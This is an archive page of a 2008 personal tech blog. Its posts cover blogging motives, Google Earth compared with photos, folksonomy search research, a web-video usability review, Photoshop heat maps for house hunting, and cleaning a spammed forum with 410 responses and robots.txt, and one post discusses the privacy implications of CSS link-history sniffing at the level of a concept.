Archive for the ‘Blog’ Category

Why have a website, why create a blog, why Twitter?

Monday, June 9th, 2008

Golden Gate Bridge from the north

My esteemed colleague Beah just started blogging, and opened her blog with a very important question - Why Blog?  I remember people asking a similar question years ago when I registered this domain - why would you want to have a website with your name on it?  Almost the same question has come to my mind recently when playing around with Twitter.

So, why blog?  With all the hundreds of thousands of blogs on the web you might think there’s no need to ask this question.  One of the best things about social science is asking questions about things that everyone takes for granted.  Unfortunately the “science” part of social science is a bit too time-consuming to finish up on a Sunday-evening blog post, so instead we’ll look at a few sites of friends and colleagues and maybe collect some thoughts on what motivates people to blog.

First, why do I blog here?  I try to keep this blog relatively professional, posting mostly on topics that I encounter in my work, in my academic research, and in my side projects (the standard disclaimer, as always, applies).  One of my motivations was sharing some of the research done for classwork - it seemed a shame to write up a report, turn it in to a professor, and then let it gather dust in some corner of my hard drive.  My undergrad degree was in journalism and I do miss writing, so that’s another motive.  Also, having been through some rough patches in my career during the dot-com downturn, I thought blogging might help me establish a bit of a professional brand.  I have my URL on my resume and I would hope that any company looking to hire me would get an idea that I’m knowledgeable and interested in relevant areas.

But I’m not a very random sample, so let’s look at a few other blogs and try to appreciate why they write.  I think I can place them into a few rough categories:

Personal takes on professional / technical interests:

This is largely where my blog falls.  Common post topics will include things like “how to get around an annoying issue with some software/programming language,” “very excited about the new device from Apple,” “report from a conference,” and “very disappointed with the new device from Apple.”

Public journaling to keep in touch with friends and family:

I’ve done this in the past as well - blogs taking the place of those old-fashioned mass emails you used to send out freshman year of college.  If you went to college in the ancient days before blogs and Facebook.  This is a place for both epic travelogues and saved IM conversations filled with inside jokes.

Sharing interests and reviews:

This category runs the gamut from folks who just want to show their friends a funny YouTube video to blogging a season of a TV show to reviewers writing prolifically about a very obscure musical genre.

Artistic or literary expression:

Self-publishing has opened the doors for artists and writers, both amateur and professional, to share their work with whatever audience they find.  This can run from virtual serial gallery shows to community-driven commentary and learning.

Of course these all overlap, and some blogs cover all the bases.  See KooKoo for KokoPuffs for an example.

So do we answer our question with a plethora of distinct motives for blogging?  Not necessarily.  There’s one theme that runs throughout all of the above - these are all social activities.  Ultimately blogging is human interaction.

Oh, and that other question - why use Twitter?  No clue.

Got a reason why you use Twitter?  Are you a co-worker angry at me for misconstruing your blog?  Please let me know in the comments below.

Google Earth vs. Reality, Revisited

Friday, June 6th, 2008

Last week I compared some real-life photos with the same scene in Google Earth.  Since I’m a bit of a computer/mapping/photography geek, I couldn’t resist doing a few more.  That actually ended up being a pretty popular post, with thousands of pageviews, which just goes to show I’m not the only combination computer/mapping/photography geek out there.

Here’s a view of San Francisco from Coit Tower on Telegraph Hill.  Follow this link to see larger versions in Flickr.  This one is even better than the two from last week - look how well the streets, buildings, and Golden Gate Bridge match with the photo.

Google Earth vs. Reality - San Francisco from Coit Tower

Now I’ll go a little more international.  Here’s a photo from the site of ancient Mycenae in Greece.  This is above the famous Lion Gate looking out at the hills surrounding the Argolid plain.  See larger versions in Flickr.  The aerial photograph that Google Earth maps to the topography isn’t as detailed as the real life photo, but even the borders of the olive groves line up.

Google Earth vs. Reality - Mycenae, Greece

These next two are not as identical as the San Francisco cityscapes, but are still impressive because of how well they evoke the real life scenes without 3-d buildings.

The first is from the Acropolis in Athens, looking out over the surrounding neighborhood.  Larger versions in Flickr.

Google Earth vs. Reality - Athens from the Acropolis

Here’s another shot from the Acropolis showing the new Acropolis Museum.  Larger versions in Flickr.

Google Earth vs. Reality - Athens and the new Acropolis Museum

If you feel like making some comparisons of your own, please let me know in the comments below - I’d love to see what other people could come up with.

Scientific proof that Reddit should add a tagging system

Tuesday, June 3rd, 2008

First, a disclaimer: the title of this post is obviously exaggerated. Proof is an awfully big word to throw around, and although I employed pretty good experiment design practices and statistical checks, I can’t really prove that Reddit should do this or that. But I can show that what they are doing now is not working, at least when it comes to search.

So, I got an email the other day letting me know that my article, Tagging and Searching: Search Retrieval Effectiveness of Folksonomies on the World Wide Web, is being published in the July 2008 issue of Information Processing and Management (here’s the official DOI link to the article). In the study I compared search performance between traditional search engines (like Google), subject directories (like Open Directory), and social bookmarking systems (like Reddit) and their folksonomies.

What’s a folksonomy? The word is a play on the term taxonomy - a taxonomy is a system of organizing and categorizing things, like the Dewey Decimal System. Taxonomies usually follow very strict rules and are controlled by experts. A folksonomy is a system of organization built by large numbers of regular users, who add things to the collection, evaluate them, and usually tag them with keywords.

IR-system-precision-1-20

In my study, the social bookmarking systems with tagging systems did surprisingly well - Del.icio.us was more precise than Open Directory, and at a cutoff of 20 results its precision was fairly close to that of the search engines.

Reddit, however, did not fare so well. It consistently had the lowest precision, meaning that searches returned very few relevant results. There could be many reasons for this, but the biggest difference between Reddit and the others is the lack of tags.
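For anyone unfamiliar with the metric, precision at a cutoff is just the share of the top results that were judged relevant. Here is a minimal sketch in Python. The function name and the sample judgments are made up for illustration and are not data from the study; counting missing results as misses is also an assumption.

```python
def precision_at_k(relevance, k):
    """Fraction of the first k results judged relevant.

    relevance: list of booleans, one per returned result, in rank order.
    If fewer than k results came back, the missing ones count as misses
    (an assumption made for this sketch).
    """
    if k <= 0:
        raise ValueError("k must be positive")
    top = relevance[:k]
    return sum(1 for r in top if r) / k


# Hypothetical judgments for one query (True = relevant), not study data.
judged = [True, True, False, True, False, False, True, False, False, False]
print(precision_at_k(judged, 5))   # 3 relevant in the top 5
print(precision_at_k(judged, 10))  # 4 relevant in the top 10
```

A system with low precision at 20 is one where most of those first 20 slots are filled with results the searcher did not want.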

Now, it’s possible that the folks at Reddit have no interest in search, or information retrieval in general. I think Reddit is very effective at bringing out new and interesting links on a daily basis and encouraging commentary (just my opinion, no stats to back that up). But I think it’s a big missed opportunity not to add tagging and see where it leads.

(One last disclaimer: this post is my personal opinion as someone who enjoys using Reddit and does not reflect on my employer. This post refers to research done independently as a grad student.)

A Scary, but Fascinating Idea - Javascript and CSS hack to see where your users have been

Friday, May 30th, 2008

Invasion of Segway infantry!

I just ran across this post on Aza Raskin’s blog about a technique used to cut down the number of social bookmarking links displayed to users.  I’m sure you’ve seen them–the 20 or so colorful buttons that have popped up at the bottom of every blog post on the web, for Digg, Del.icio.us and similar sites.  On my blog they are hidden behind the ShareThis Widget but Raskin had a better idea - why not just display the ones each user actually uses?

Impossible?  Not so fast - think about what happens when you visit a site.  After your visit any links to the site will change, usually from blue to purple.  We can put up links to each social bookmarking site and then use Javascript and CSS to check to see if each link has been visited.  If so, display the button, and if not, hide it.

This is a very cool way to manage buttons but the technique has wider privacy implications.  I could, for example, put links to…  questionable sites, and then use some Ajax to collect that information about users.  If I had other information about you (say you logged into my site or otherwise gave me an email address) I could link it together and build a database.

On the other hand, it’s not like I can grab your entire browsing history or follow you around after you leave my site - I have to specifically create a link and check it for every site I want to know about.  And unlike your browser history this info is cleared every time you close your browser.  So it’s not spyware or anything as intrusive as, say, the Alexa toolbar.

I can think of a bunch of cool ways to apply this technique, but I’m not sharing until I implement one.  Feel free to post any ideas (or misgivings) in the comments below.

Google Earth vs. Reality

Wednesday, May 28th, 2008

Google Earth is getting better and better and will soon be almost as good as actually being there. Don’t believe me? I decided to pick a couple of shots and line up the same view in Google Earth to compare. This first photo is from San Bruno Mountain (original photo here), showing the San Francisco skyline:

Google Earth vs. Reality - San Francisco

You should definitely click through to see the full-sized version. The version on the right is missing the flowers in the foreground and the clouds are a little different but otherwise it’s very recognizable.

Here’s another shot of San Francisco, this one from the bay (original photo here). I thought this would show off the detail of some of the 3d buildings in Google Earth. I had a hard time lining up a large screenshot because the photo was taken at 8x zoom, but you get the idea.

Google Earth vs. Reality - San Francisco from the Bay

Again, you should click through to the full-sized version to get the full effect.

What do you think? Will Google Earth evolve to the point where no one will ever need to travel? My guess is that people will still get wanderlust and until Google unveils a food modem you’ll have to go get the sourdough yourself.

Let me know if you liked these in the comments and I’ll do a few more.

The Art of Information Graphics

Wednesday, May 14th, 2008

I recently ran across a couple of really great examples of how information can be conveyed dramatically with information graphics and one example of how to fix graphics that aren’t so good.

First, from the Radical Cartography project, a map of all nuclear explosions since 1945.  This map encodes a lot of information fairly simply - we can see where nuclear tests have taken place, countries are indicated by color, and blast yield is indicated by size.  Click on the image to see the full version.

Next, from the United Nations Environment Programme’s Global Environment Outlook report, you can see a great illustration of how little of the world’s water is freshwater and how little of that is readily available in rivers and lakes.  Click on the image to see the full-sized version.

Why point out good examples of information design?  Because even the professionals get it very wrong a lot of the time.  Bob Nystrom wrote a great post about how little information is presented in CNN’s chart of the delegate totals for Hillary Clinton and Barack Obama.  Here’s their version:

Without looking at the numbers, can you tell who’s in the lead?  Can you tell how close the race is to the end?  Do you read the bars left-to-right or up-and-down?  Here’s Nystrom’s improvement:

Everything becomes clearer.

Got any good (or bad) examples?  Post them in the comments below.

Keep your Wordpress site from being hacked with automatic upgrades

Monday, May 5th, 2008

I’ve already written about what to do once your site has been hacked, but let’s talk a bit about hack prevention.

I think it’s fair to say that most people manage their own Wordpress installation because they have some programming background and want a little more control than you get with a hosted solution like Blogger or Wordpress.com.  Webmasters like you and me usually know a bit about security and how important it is to keep things up to date.  The problem is that every minute spent upgrading your CMS to the latest version is a minute not spent writing or running your business.

So you know you should download the latest patch, make backups, disable plugins, install… but it’s already 1 a.m. and you need to meet clients in the morning, so you put it on the back burner and your site ends up hacked.  What’s the solution?  If you’re Technorati, the solution is to motivate bloggers a bit more by threatening to delist them.  I can understand their point of view.  But how about something a bit more positive - automation.

There are two ways I’ve automated Wordpress upgrades.  One is through Fantastico, which is a really cool script management system that your web host should probably provide.  I’m giving up on Fantastico, though, because it takes a long time for it to notice updates.

The second way I just tried out recently is the Wordpress Automatic Upgrade plugin.  I’ve tried it out on three blogs now and so far so good - it hasn’t skipped a beat.  This functionality really needs to be folded into Wordpress itself - with 2.5, they added the ability to automatically upgrade plugins but it seems like most security holes lately are found in the Wordpress code itself.

That plugin is Wordpress-only, but I recommend doing some research to see if there’s something similar out there for your blog software or CMS.  Even if Wordpress never has another security bug, there’s always Joomla, and Drupal, etc…

The Ethics of Web Apps, or, Ever try to get a list of your contacts from Facebook?

Sunday, April 20th, 2008

Jagged path

Even before I worked at Google, I was pretty impressed by the “don’t be evil” motto.  Not that I think any company is perfect or that anyone can hire only saintly employees - but it’s impressive when anyone recognizes the ethical implications of what we do as programmers and web developers.

Now that I work there, I can tell you that everyone really seems to take it to heart (disclaimer:  this is my personal blog and I am not representing my employer in any way).  At this point, you may be asking, “programs are just lists of instructions, web sites are just products, what’s the ethical dilemma?”

I’ll give you an example.

I’m a big fan of Facebook, I think they’ve really done a great job building a social networking system, and it’s been very useful for keeping up with friends all over the world.  But I also have an account at LinkedIn, and Flickr, and Yelp, and an address book in Thunderbird, and another on my iPhone, and…  you get the picture.  So I’m trying to collect all my contacts together in one system (Gmail) so I can just import/export to keep all these different social networking systems up to date.

But Facebook doesn’t have a function to export a list of contacts and email addresses.  What’s more, they’ve apparently actively blocked attempts by developers to build systems to do it and disabled people’s accounts.

They are, of course, not legally obligated to let you export your contacts.  And if I were building a social networking site, it probably wouldn’t be the first feature I would implement.  But ethically, I think, they should do so.  Why?  We can refer to Kant’s categorical imperative or Jesus’ golden rule:  They should build open systems because they would like other systems to be open.

They certainly take advantage of the openness of other systems, allowing you to import contacts from Gmail.  Google’s social networking site, Orkut, will happily export your contacts, and I don’t think that’s an accident.  The engineers and product managers at Google make conscious choices to do the right thing.

But wait…  am I really asking them to make it easy for their users to take their data and go over to a competitor?  Isn’t that a bad business practice?

It’s possible, but beside the point.  I’m sure you and I could think of plenty of things that are profitable but morally repugnant.  What’s more, I don’t think it is a bad business practice at all.  I think that the walled garden approach is a sign of desperation rather than innovation.  Orkut is not the only one that lets you take your data with you - LinkedIn allows exports, for example.

Paul Graham wrote a really interesting post about this recently:

When you’re small, you can’t bully customers, so you have to charm them. Whereas when you’re big you can maltreat them at will, and you tend to, because it’s easier than satisfying them. You grow big by being nice, but you can stay big by being mean.

If you’d like to read more about this subject and see what some developers are doing to make your data more portable, check out DataPortability.org.

Web Video Usability Review: South Park Studios

Monday, March 31st, 2008

After a few years of YouTube showing the world how to do video on the web, lots of traditional broadcasters and studios have started putting their content online. Part of the reason is to try to steal YouTube’s thunder - a more market-friendly tactic than just lawsuits. Many of these sites are trying to figure out an advertising model and make money, while others are obviously trying to get viewers more engaged by joining social networks, making mash-ups, etc.

But enough about their goals, what about user goals and experience? In web video the content may be king but usability is almost as important. If your user interface is difficult, confusing, or unpleasant, users will leave your site to get the content elsewhere.

So I’m going to try to do a usability review of various web video sites over the next few weeks. These won’t be formal reviews with user tests and cool eye-tracking heatmaps. Instead I’ll point out some user goals and hold up each site to the same rubric.

The first site: SouthParkStudios.com

southpark-screenshot

So, what do users want out of web video? I can think of a number of scenarios: finding a particular clip or episode, watching recent episodes, sending a link to a friend or embedding a clip in a blog, and, well, just enjoying the show.

Selection

Score: 4 out of 4 points. This site has everything - every show from every season.

Finding Particular Videos

Method: I’m taking a cue from the creators of Friends - people don’t remember episode names. So I’ll be doing a Google search for the show name and “the one where” and taking the first relevant result. In this case it’s “the one where Ben Affleck has a relationship with Cartman’s Jennifer Lopez hand” (without quotes).

Score: 2 out of 4 points. The search fails, but a simpler query for “Ben Affleck” leads us right to the clips. The full episode is available.

Watching Videos

How easy is it to watch videos? What’s the quality?

Score: 4 out of 4. It’s immediately apparent what to click on to see an episode or clip. You can watch videos full screen and South Park’s animation lends itself well to compressed video. The navigation between episodes is pretty nice, with thumbnails of all episodes for that season along the bottom of the window.

Linking to Videos

Score: 3 out of 4 points. The URL for each clip and episode is available by clicking the “Share” button. Clips open up in the main window so you can get the link like any other web page. The only lost point is the fact that the episodes open in new windows - what is the point? It takes away my browser toolbar and any social bookmarking toolbars or extensions I might normally use.

Embedding videos

Let’s give it a try:

Score: 3 out of 4 points. Once again use the Share button to get the embed code. They lose a point for not allowing embedding of full episodes - they probably have good reasons for not wanting users to do so, but we’re only concerned about the user’s side of things right now.


Advertising

Score: 3 out of 4 points. Ads are shown before the video (for clips) or at two break points about halfway through (for full episodes). Commercials are short and don’t obscure video or interrupt the show more than normal TV commercials would. They lose a point, though, because of the lack of variety - I watched a few episodes and plenty of clips and only saw two different commercials, over and over again.

Audio Experience

I’m going to go with a slightly different scale this time: introducing the patented Bleeding Ear Scale of Web Video Volume.

You may have noticed that some TV stations play their commercials a little louder than the show. The theory I’ve always heard is that they want to catch your attention even if you get up to go to the fridge.

Score:

bleeding ear bleeding ear bleeding ear bleeding ear

Unfortunately, most people don’t watch web video the same way they watch TV - they’re usually sitting much, much closer to the speakers or wearing headphones. The bone-shattering difference in volume between the video and the commercials on SouthParkStudios.com earned the site four bleeding ears.

Total score: 19 out of 24 points, with a special note to dive for the volume button whenever an ad is coming up.
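For anyone who wants to check the tally or reuse the rubric on another site, here is a small Python sketch. The category names and scores are copied from the review above; the variable names are made up for illustration. The Bleeding Ear rating is left out because it uses its own scale.

```python
# Scores as given in the review above; each category is out of 4 points.
scores = {
    "Selection": 4,
    "Finding Particular Videos": 2,
    "Watching Videos": 4,
    "Linking to Videos": 3,
    "Embedding videos": 3,
    "Advertising": 3,
}
MAX_PER_CATEGORY = 4

total = sum(scores.values())
possible = MAX_PER_CATEGORY * len(scores)
print(f"Total score: {total} out of {possible} points")
```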

House hunting the geek way, Part 2: Data-driven maps in Photoshop

Friday, March 28th, 2008

In part 1 we created a simple heat map in Photoshop to figure out which neighborhoods would be good places to look for a new house. But distance from work and school isn’t the only factor worth considering. We can always add more radial gradients to show proximity to favorite restaurants, family members, and the like. But that’s really just more of the same.

Think about the things that make a neighborhood a pleasant place to be - low crime, low pollution, parks nearby, friendly neighbors - some of those things can be quantified and mapped. We’ll have to wait for demographers to release official neighborhood friendliness metrics after the next census, but let’s see if we can find some of the other data.

Step 3: Highlight on-map elements

At least one of the new factors we want to look at is already available on our map - parks. All the parks on the map are in one of two shades of green. Use the Magic Wand Tool to select park areas and then Select -> Similar. You can see how I’ve selected the parks in the example below.

megamap-example-parks

Now we’re going to do something similar to the concentric circles in step 2. Choose Select -> Modify -> Expand. You might have to play around with the number of pixels you expand by - for the scale I was working at, 20 pixels looked like close walking distance. Now use the fill tool with a low opacity to fill the area with the same color you used for the circles.

You can then repeat the expand and fill steps as many times as you like to build a heat map of park proximity. Don’t forget to change the blending mode to Multiply to match your other layers.
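If you’re curious what the expand-and-fill loop is doing, here is a rough Python sketch on a tiny grid. It is a stand-in for the Photoshop steps, not what Photoshop actually runs: the hypothetical `expand` function grows a selection by one cell in every direction (including diagonals, which is an assumption), and each pass adds one more “fill” to everything selected so far.

```python
def expand(mask):
    """Grow a selection by one cell in every direction (8 neighbours)."""
    rows, cols = len(mask), len(mask[0])
    grown = [[False] * cols for _ in range(rows)]
    for r in range(rows):
        for c in range(cols):
            if mask[r][c]:
                for dr in (-1, 0, 1):
                    for dc in (-1, 0, 1):
                        rr, cc = r + dr, c + dc
                        if 0 <= rr < rows and 0 <= cc < cols:
                            grown[rr][cc] = True
    return grown


def proximity_heat(mask, passes):
    """Repeat expand-and-fill; cells nearer the park collect more fills."""
    rows, cols = len(mask), len(mask[0])
    heat = [[0] * cols for _ in range(rows)]
    current = mask
    for _ in range(passes):
        current = expand(current)
        for r in range(rows):
            for c in range(cols):
                if current[r][c]:
                    heat[r][c] += 1  # one low-opacity fill
    return heat


# A hypothetical one-cell "park" in the middle of a 7x7 map.
park = [[r == 3 and c == 3 for c in range(7)] for r in range(7)]
heat = proximity_heat(park, passes=3)
for row in heat:
    print(" ".join(str(v) for v in row))
```

The printed grid has its highest numbers at and next to the park and drops off toward the edges, which is the same effect the stacked low-opacity fills give you on the map.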

megamap-example-parks-heatm

You can follow similar steps for other on-map elements, like shopping centers, college campuses, bodies of water - it all depends on what you like to be near and what’s available on your base map.

Step 4 - Pulling in data maps

First, a disclaimer: this isn’t a tutorial on how to automatically pull data from a server and have Photoshop map it for you (but keep watching my blog for a similar project in the future). Instead, we’re going to pull data maps from other places on the web and fit them over our heatmap.

The hardest part of this next step is finding the maps. The number and quality of maps available depends on your location, but in general the best two places to look are county and city websites and nearby colleges. If you don’t find what you’re looking for under “Maps” try looking for “GIS,” planning departments, or property information. Also, many government web sites have poor search systems - try doing a Google search with the site operator instead. For example, a search for Cuyahoga County might look like this: site:cuyahogacounty.us maps gis.
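If you plan to check a lot of county and city sites, you can build these searches with a few lines of Python. This is only a sketch: the function name is made up, and it assumes Google’s usual search URL with the query in the `q` parameter.

```python
from urllib.parse import urlencode


def site_search_url(domain, terms):
    """Build a Google search URL restricted to one domain via site:."""
    query = f"site:{domain} {terms}"
    return "https://www.google.com/search?" + urlencode({"q": query})


print(site_search_url("cuyahogacounty.us", "maps gis"))
```

Swap in the domain of your own county, city, or nearby college and whatever terms you are hunting for.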

For this example, I’m going to grab a map from Case Western Reserve University’s NEO CANDO site. Another good source for the Cleveland area is the Cuyahoga County Brownfields GIS server. My wife and I both have graduate degrees and we really value education - so I’m going to grab a map of the percentage of people with bachelor’s degrees or higher by census tract.

Cuyahoga_NEOCANDO32443568931

Now that we have a data map, we need to clean it up a bit and add it to our base map. Open the data map in Photoshop and use the Magic Wand tool to select the black and gray areas - the lines and numbers. Use Select -> Similar to make sure you have most of it selected and hit Delete. Now Select All, Copy and Paste it into your map as a new layer.

You might want to use the Magic Wand and Select -> Similar again to clear out all the white area around the map and leave it transparent, but you don’t have to - you’re going to change the layer blending mode to Multiply like the other layers anyway. At this point, I can almost guarantee that the data map will be much smaller than your base map. Choose Edit -> Transform -> Scale to stretch it to fit. There’s no sure-fire way to do this, just keep stretching until you have a good fit to known boundaries like coastlines and major streets.

Here’s the result:

megamap-example-college

Step 5 - Bring it all together

Now that we have all these different layers, it’s time to pull them all together in one heat map.  You have a few options on how to do this.  If you make all the layers visible at the same time you’re going to get a lot of very blue areas.  Instead, try lowering the opacity of each layer based on how important it is to you.  You can see an example of my Cleveland area map below.
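One way to think about the opacity trick is as a weighted average of the layers. Here is a rough Python sketch of that idea. It is a simplification rather than a model of Photoshop’s blending modes, and the layer values and weights are invented for illustration.

```python
def combine_layers(layers, weights):
    """Weighted average of same-sized heat layers (values 0.0 to 1.0).

    weights play the role of per-layer opacity: a higher weight means
    the layer matters more to you.
    """
    total_weight = sum(weights)
    rows, cols = len(layers[0]), len(layers[0][0])
    combined = [[0.0] * cols for _ in range(rows)]
    for layer, weight in zip(layers, weights):
        for r in range(rows):
            for c in range(cols):
                combined[r][c] += layer[r][c] * weight / total_weight
    return combined


# Hypothetical 2x2 layers: commute distance, parks, education.
commute = [[1.0, 0.5], [0.0, 0.5]]
parks = [[0.0, 1.0], [0.0, 1.0]]
education = [[1.0, 1.0], [0.0, 0.0]]

result = combine_layers([commute, parks, education], weights=[5, 2, 3])
for row in result:
    print([round(v, 2) for v in row])
```

Raising one weight pulls the combined map toward that layer, much like nudging its opacity slider up.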

megamap-example-final

If you want to make the strongest areas of the heat map more visible, start by making your base map invisible while leaving all your other layers up.  Go to Select -> Color Range and click the eye dropper on the darkest blue area you can find.  Now increase the Fuzziness until it looks like the best areas are selected.  Hit the OK button, create a new blank layer, turn off the rest of your layers, and fill the selection with your blue.  You can see the result below.
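In code terms, this step is roughly a threshold: keep every spot whose value is close enough to the darkest one. The Python sketch below uses a hard cutoff, which is a simplification of how Photoshop’s Fuzziness setting behaves, and the heat values are invented for illustration.

```python
def select_color_range(heat, target, fuzziness):
    """Select cells whose value is within `fuzziness` of `target`."""
    return [[abs(v - target) <= fuzziness for v in row] for row in heat]


# Hypothetical combined heat values (1.0 = darkest blue).
heat = [
    [0.9, 0.7, 0.2],
    [0.8, 0.5, 0.1],
    [0.4, 0.3, 0.0],
]
darkest = max(max(row) for row in heat)  # where the eye dropper clicked
best = select_color_range(heat, darkest, fuzziness=0.25)
for row in best:
    print("".join("#" if picked else "." for picked in row))
```

A larger `fuzziness` widens the selection, just as dragging the slider to the right does.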

megamap-example-final2

Hopefully this has been helpful.  You don’t have to make your map quite as involved as mine, and of course if you are looking in a smaller area you can constrain your map further.

Stay tuned for more updates on this topic.  If you have a feed reader you can subscribe to my blog and if you’d like you can get email updates, too.

House hunting the geek way, Part 1: Using Photoshop to make heat maps

Wednesday, March 26th, 2008

If you’ve ever moved to a new city and looked for a house or apartment you know how difficult it can be.  What neighborhood, which side of town?  Can we live close to my wife’s workplace and not too far from mine?

I thought I would share the method I used to find our last house, using Photoshop to build a heat map of the city.  Note that this is NOT the method I used to find our current apartment - watch this space for more news on that coming up.

Step 1 - Build a map

In order to build our heat map you’ll need a base map to place everything on.  Back in 2004 when I did this project Mapquest was still the best thing going, so that’s what I used.  If I were doing it now, I would go with Google Maps.

This is the most tedious step, since you’ll need to center your map, take a screenshot, then cut the map portion of the screenshot and paste it into your working image.  If you have a scanner and a nice print map you’d like to use instead, feel free to go that route.

You can see my example, a map for the Greater Cleveland area, below.  Click to see a larger version.  The inset shows you the level of street detail I found best - zoomed in close enough to see all the streets, but not so close as to make your map unusably large.

megamap-example-plain

Step 2 - Place your main locations

What are the three most important factors in real estate?  Location, location, location.  In our case we want to live close to the locations we need to go to on a regular basis.  For us that was two workplaces and two universities.

Heat maps are a great way to visualize information.  They are a perfectly appropriate choice for map location and distance information.  So create a new layer in Photoshop.  Choose the gradient tool and make sure you’re using a Radial Gradient.  The gradient should go from a solid color (I chose blue) to transparent.  Using the map, create a radial gradient about as wide as you would like to drive.

These smooth gradients can make it hard to make distinctions when you are zoomed in and, on a large map, will take up a lot of disk space.  So an alternative method would be to create a series of concentric circles, each smaller than the last.  That’s the method I used in the example below.

megamap-example-locations

Once you have one good circle layer, copy it for each of the locations you want on your map and drag them into place.  You’re probably going to want to change the blending mode for the layers so that you can still see map details - I recommend using Multiply and lowering the opacity just a bit.
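For the curious, here is a rough Python sketch of what the circle layers add up to at any one point on the map. Everything in it is an assumption made for illustration: the coordinates are invented, the falloff is linear, and summing the layers is a stand-in for stacking them (Photoshop’s Multiply blend darkens rather than adds).

```python
import math


def radial_heat(x, y, cx, cy, radius):
    """1.0 at the centre, fading linearly to 0.0 at `radius`."""
    distance = math.hypot(x - cx, y - cy)
    return max(0.0, 1.0 - distance / radius)


def ringed_heat(x, y, cx, cy, radius, rings):
    """Same falloff snapped to `rings` flat bands (concentric circles)."""
    smooth = radial_heat(x, y, cx, cy, radius)
    return math.ceil(smooth * rings) / rings


def combined_heat(x, y, places, radius, rings):
    """Sum the ringed heat of every location at one map point."""
    return sum(ringed_heat(x, y, cx, cy, radius, rings) for cx, cy in places)


# Hypothetical pixel coordinates: three places close together, one far away.
places = [(10, 10), (14, 10), (12, 14), (40, 40)]
print(combined_heat(12, 11, places, radius=10, rings=4))
print(combined_heat(40, 40, places, radius=10, rings=4))
```

A point between the three nearby places scores much higher than the far-off location, which only ever picks up heat from its own circle.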

In my example map, you can already see how this could help narrow down which neighborhoods to look in.  It also shows quite visually that there’s no point in trying to live closer to Kent - it doesn’t intersect with any of the other hot spots.

In part 2, we’ll take a look at pulling in data maps for things like crime statistics, highlighting other map features, and pulling it all together.  Also, I’ll have an exciting announcement about another project I’ve been working on soon as well.  Stay tuned.

Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Sun setting behind a sculpture in the park near Google

Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on Wordpress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, even worse, your ftp account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all ftp accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in its own right so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever by serving a 410 (Gone). You can do this with any server-side language; my example is in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

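<?php
// Tell browsers and spiders that this content is permanently gone.
header("HTTP/1.1 410 Gone");
header("Status: 410 Gone"); // some CGI/FastCGI setups read the status from this header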

This will cover the main directory and then you can use mod_rewrite to redirect all the deleted pages to your 410 file.
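
Since any server-side language will do, here is the same idea as a minimal Python WSGI sketch. It is an illustration under assumptions, not the setup used on this site: the /forum/ path, the GONE_PREFIX name, and the application function are all hypothetical, and it assumes your host can run a WSGI app. It answers 410 for the removed directory and everything beneath it, which also covers the individual deleted pages.

```python
# Minimal WSGI sketch: answer 410 Gone for everything under a removed directory.
# GONE_PREFIX is a hypothetical path; change it to your formerly-spammed directory.
GONE_PREFIX = "/forum/"


def application(environ, start_response):
    """Return 410 for the removed directory and 404 for anything else."""
    path = environ.get("PATH_INFO", "")
    if path == GONE_PREFIX.rstrip("/") or path.startswith(GONE_PREFIX):
        status = "410 Gone"
        body = b"This content has been permanently removed.\n"
    else:
        status = "404 Not Found"
        body = b"Not found.\n"
    headers = [
        ("Content-Type", "text/plain; charset=utf-8"),
        ("Content-Length", str(len(body))),
    ]
    start_response(status, headers)
    return [body]
```

To try it locally, you can serve the application function with the standard library’s wsgiref.simple_server and request a few paths to confirm which ones come back as 410.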

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /
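
Before waiting for spiders to come back, it can be worth checking that the rules really block what you think they block. The sketch below uses Python’s standard urllib.robotparser module against the two robots.txt examples above; the is_blocked helper and the example.com URLs are made up for illustration, and real crawlers may interpret edge cases differently than this parser does.

```python
from urllib.robotparser import RobotFileParser


def is_blocked(robots_txt, url, user_agent="*"):
    """Return True if the given robots.txt text disallows fetching url."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(user_agent, url)


# The two rule sets from this post: one for a subdirectory, one for a subdomain.
SUBDIRECTORY_RULES = "User-agent: *\nDisallow: /forum/\n"
SUBDOMAIN_RULES = "User-agent: *\nDisallow: /\n"

if __name__ == "__main__":
    # Hypothetical URLs; substitute pages from your own site.
    print(is_blocked(SUBDIRECTORY_RULES, "http://www.example.com/forum/viewtopic.php"))
    print(is_blocked(SUBDIRECTORY_RULES, "http://www.example.com/blog/"))
    print(is_blocked(SUBDOMAIN_RULES, "http://forum.example.com/index.php"))
```

The point of the check is the second call: the subdirectory rule should block the forum without also hiding the rest of your site.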

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.example.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automatically the way it would if you had added a subdirectory as a new site.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.


Setting up a Firefox extension development environment

Sunday, March 16th, 2008

